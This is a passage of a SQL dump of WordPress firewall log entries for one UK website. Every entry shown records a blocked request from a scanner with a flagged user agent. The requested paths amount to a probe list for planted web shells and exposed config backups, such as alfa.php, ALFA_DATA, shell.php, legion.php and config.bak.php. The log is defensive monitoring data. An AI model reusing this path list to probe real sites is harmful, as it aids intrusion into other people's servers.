User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11605,1674057694.451357,1674057694.327800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11606,1674057692.777593,1674057692.664000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11607,1674057691.736069,1674057691.591000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11608,1674057691.194574,1674057691.066900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11609,1674057690.123927,1674057689.994500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11610,1674057689.325843,1674057689.180000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11611,1674064208.529096,1674064208.355900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://dailyjolly.co.uk/a/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L2EvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11612,1674074748.272793,1674074748.106900,'\0\0\0\0\0\0\0\0\0\0��{�/�',0,403,0,0,0,'https://dailyjolly.co.uk/arx/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L2FyeC9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11613,1674085234.301148,1674085233.828700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11614,1674085232.893482,1674085232.239100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11615,1674085231.315478,1674085230.454100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11616,1674085225.644594,1674085224.614900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11617,1674085223.686643,1674085223.149400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11618,1674085222.203393,1674085221.543600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11619,1674085220.605107,1674085219.967600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11620,1674085218.973143,1674085218.741700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11621,1674085217.799795,1674085217.046100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11622,1674085216.110595,1674085215.535000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11623,1674085214.608893,1674085213.868100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11624,1674085187.615761,1674085186.718100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11625,1674085185.772720,1674085185.301300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11626,1674085184.346537,1674085183.685100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11627,1674085180.752404,1674085179.855800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11628,1674085178.901509,1674085178.310200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11629,1674085177.900091,1674085176.985300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11630,1674085175.233739,1674085174.485500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11631,1674085173.553750,1674085172.965700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11632,1674085172.027142,1674085171.059900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11633,1674085163.036153,1674085162.217800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11634,1674085158.745467,1674085158.120100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11635,1674085156.686267,1674085156.215400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11636,1674085155.256853,1674085154.777200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11637,1674085150.901109,1674085150.437800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11638,1674085149.508395,1674085149.264800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11639,1674085146.497845,1674085146.282900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11640,1674085145.349164,1674085144.763500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11641,1674085143.830374,1674085143.656700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11642,1674085143.252854,1674085143.068600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11643,1674085142.134042,1674085141.949800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11644,1674085141.104371,1674085140.810100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11645,1674085427.791630,1674085426.683200,'\0\0\0\0\0\0\0\0\0\0��r_&�',0,403,0,0,0,'https://dailyjolly.co.uk/backup/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L2JhY2t1cC9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11646,1674085301.110253,1674085300.244800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11647,1674085299.824587,1674085299.069000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11648,1674085298.653009,1674085297.926700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11649,1674085297.520340,1674085296.657900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11650,1674085296.242529,1674085295.682000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11651,1674085295.290126,1674085294.504800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11652,1674085294.091383,1674085293.501600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11653,1674085293.109617,1674085292.304400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11654,1674085291.912621,1674085291.537200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11655,1674085291.145374,1674085290.383600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11656,1674085289.988123,1674085289.056600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11657,1674085288.644222,1674085287.850400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11658,1674085287.448778,1674085287.146600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11659,1674085286.749112,1674085285.955000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 